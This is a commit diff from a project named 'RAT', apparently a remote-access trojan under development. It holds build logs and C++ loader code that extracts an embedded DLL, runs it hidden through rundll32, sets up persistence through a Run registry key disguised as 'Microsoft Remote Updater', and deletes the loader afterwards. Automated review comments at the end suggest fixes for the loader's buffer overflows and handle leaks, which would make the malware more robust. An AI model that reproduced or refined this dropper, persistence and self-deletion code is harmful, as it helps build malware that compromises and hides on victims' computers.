DLL now has persistance, Loader deletes itself after extracting dll and creating persistance
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,5 +1,6 @@
|
|||||||
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
|
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
|
||||||
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior.
|
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior.
|
||||||
|
fundll.cpp
|
||||||
Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp
|
Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp
|
||||||
Generating code
|
Generating code
|
||||||
All 3 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
|
All 3 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
+1
-1
@@ -31,7 +31,7 @@
|
|||||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<PlatformToolset>v141_xp</PlatformToolset>
|
<PlatformToolset>v141_xp</PlatformToolset>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
|
|||||||
+7
-3
@@ -6,14 +6,18 @@ BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) {
|
|||||||
|
|
||||||
break;
|
break;
|
||||||
case DLL_PROCESS_DETACH:
|
case DLL_PROCESS_DETACH:
|
||||||
|
|
||||||
break;
|
break;
|
||||||
default:
|
default:
|
||||||
|
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
return 1;
|
||||||
}
|
}
|
||||||
|
|
||||||
extern "C" __declspec(dllexport) int FunEntry() {
|
extern "C" __declspec(dllexport) int FunEntry() {
|
||||||
return MessageBoxA(0, "Hello from C2", 0, 0);
|
char exe[MAX_PATH + 1];
|
||||||
|
GetModuleFileNameA(0, exe, sizeof(exe));
|
||||||
|
MessageBoxA(0, exe, "I am inside: ", 0);
|
||||||
|
return 0;
|
||||||
}
|
}
|
||||||
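Review bot: The return value of `GetModuleFileNameA(0, exe, sizeof(exe))` in `FunEntry` is discarded and `exe` is never initialized, so if the call fails the `MessageBoxA` that follows displays whatever happened to be on the stack, and on truncation older Windows targets (this project still builds with the `v141_xp` toolset) are not guaranteed to leave a terminator either. Capture and check the result before using the buffer: `DWORD n = GetModuleFileNameA(NULL, exe, sizeof(exe));` followed by `if (n == 0 || n >= sizeof(exe)) return 1;`. As a point of style, the `return 1;` added to `DllMain` in this hunk would read better as `return TRUE;` since the function is declared `BOOL`; `DllMain` itself begins before the hunk.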
Binary file not shown.
@@ -1,2 +1,2 @@
|
|||||||
LINK : C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe not found or not built by the last incremental link; performing full link
|
injector.cpp
|
||||||
Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe
|
Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,2 +1,6 @@
|
|||||||
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
|
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
|
||||||
|
cl : Command line warning D9025: overriding '/sdl-' with '/GS-'
|
||||||
|
loader.cpp
|
||||||
|
tools.cpp
|
||||||
|
Generating Code...
|
||||||
Loader.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Loader.exe
|
Loader.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Loader.exe
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -96,7 +96,7 @@
|
|||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Windows</SubSystem>
|
<SubSystem>Windows</SubSystem>
|
||||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
<AdditionalDependencies>kernel32.lib;user32.lib</AdditionalDependencies>
|
<AdditionalDependencies>kernel32.lib;user32.lib;advapi32.lib</AdditionalDependencies>
|
||||||
</Link>
|
</Link>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
|
|||||||
+49
-1
@@ -4,7 +4,7 @@
|
|||||||
INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) {
|
INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) {
|
||||||
PBYTE module_base = PBYTE(Tools::GetImageBase());
|
PBYTE module_base = PBYTE(Tools::GetImageBase());
|
||||||
if (module_base != ERROR) {
|
if (module_base != ERROR) {
|
||||||
// extract payload from section move to %appdata% with random name
|
// extract payload from section
|
||||||
DWORD module_size = NULL;
|
DWORD module_size = NULL;
|
||||||
PBYTE dll_memory = Tools::ExtractDllFile(module_base, &module_size);
|
PBYTE dll_memory = Tools::ExtractDllFile(module_base, &module_size);
|
||||||
|
|
||||||
@@ -18,6 +18,54 @@ INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) {
|
|||||||
if (new_file != INVALID_HANDLE_VALUE) {
|
if (new_file != INVALID_HANDLE_VALUE) {
|
||||||
WriteFile(new_file, dll_memory, module_size, &bytes_written, NULL);
|
WriteFile(new_file, dll_memory, module_size, &bytes_written, NULL);
|
||||||
}
|
}
|
||||||
|
CloseHandle(new_file);
|
||||||
|
}
|
||||||
|
LocalFree(dll_memory);
|
||||||
|
|
||||||
|
// runs the dll after extraction
|
||||||
|
WCHAR win_path[MAX_PATH];
|
||||||
|
if (ExpandEnvironmentStringsW(TEXT("%WINDIR%"), win_path, MAX_PATH - 1) > 0) {
|
||||||
|
if (wsprintfW(win_path, TEXT("%s\\System32\\rundll32.exe "), win_path) != NULL) {
|
||||||
|
lstrcatW(win_path, appdata_path);
|
||||||
|
lstrcatW(win_path, L",");
|
||||||
|
lstrcatW(win_path, L"FunEntry");
|
||||||
|
|
||||||
|
STARTUPINFO startup_inf{ 0 };
|
||||||
|
PROCESS_INFORMATION process_information{ 0 };
|
||||||
|
startup_inf.cb = sizeof(startup_inf);
|
||||||
|
|
||||||
|
BOOL b = CreateProcessW(NULL, win_path, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_NO_WINDOW, NULL, NULL, &startup_inf, &process_information);
|
||||||
|
|
||||||
|
if (b) {
|
||||||
|
HKEY reg_key;
|
||||||
|
LONG bb = RegOpenKeyExA(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, ®_key);
|
||||||
|
if (bb == ERROR_SUCCESS) {
|
||||||
|
RegSetValueEx(reg_key, L"Microsoft Remote Updater", 0, REG_SZ, (LPBYTE)win_path, sizeof(win_path));
|
||||||
|
RegCloseKey(reg_key);
|
||||||
|
}
|
||||||
|
//WaitForSingleObject(process_information.hProcess, INFINITE);
|
||||||
|
//CloseHandle(process_information.hProcess);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// delete loader
|
||||||
|
WCHAR del_cmd[MAX_PATH];
|
||||||
|
if (ExpandEnvironmentStringsW(TEXT("%WINDIR%"), del_cmd, MAX_PATH - 1) > 0) {
|
||||||
|
if (wsprintfW(del_cmd, TEXT("%s\\System32\\cmd.exe "), del_cmd) != NULL) {
|
||||||
|
WCHAR app_name[MAX_PATH];
|
||||||
|
GetModuleFileNameW(0, app_name, MAX_PATH);
|
||||||
|
lstrcatW(del_cmd, L"/c del \"");
|
||||||
|
lstrcatW(del_cmd, app_name);
|
||||||
|
lstrcatW(del_cmd, L"\"");
|
||||||
|
|
||||||
|
STARTUPINFO sii{ 0 };
|
||||||
|
PROCESS_INFORMATION pii{ 0 };
|
||||||
|
sii.cb = sizeof(sii);
|
||||||
|
|
||||||
|
CreateProcessW(NULL, del_cmd, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_NO_WINDOW, NULL, NULL, &sii, &pii);
|
||||||
|
return 0;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
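Review bot: The `lstrcatW` calls that append `appdata_path` and `,FunEntry` onto `win_path` write into a `WCHAR win_path[MAX_PATH]` that already holds `%WINDIR%\System32\rundll32.exe `, with no length check, so a long profile path overflows the stack buffer — and the Loader build log in this same commit shows `overriding '/sdl-' with '/GS-'`, so no stack cookie would catch it; size the buffer for both paths (e.g. `WCHAR win_path[2 * MAX_PATH + 32];`) and build the command with a length-checked formatting call instead of unbounded concatenation. `wsprintfW(win_path, TEXT("%s\\System32\\rundll32.exe "), win_path)` (and the matching `del_cmd` call) also passes the destination buffer as its own `%s` argument, which is undefined behaviour; format into a separate buffer. `CloseHandle(new_file);` now sits after the `if (new_file != INVALID_HANDLE_VALUE)` block, so it runs on a failed `CreateFile` as well — move it inside that block. `RegSetValueEx(..., (LPBYTE)win_path, sizeof(win_path))` passes the whole buffer rather than the string's length, so uninitialized stack bytes past the terminator are stored in the registry value; use `(lstrlenW(win_path) + 1) * sizeof(WCHAR)`. The process and thread handles returned by both `CreateProcessW` calls are never closed (the `CloseHandle` is commented out and `pii` is not touched), and `WinMain` begins before this hunk, so `appdata_path` and the `CreateFile` that produced `new_file` are outside it.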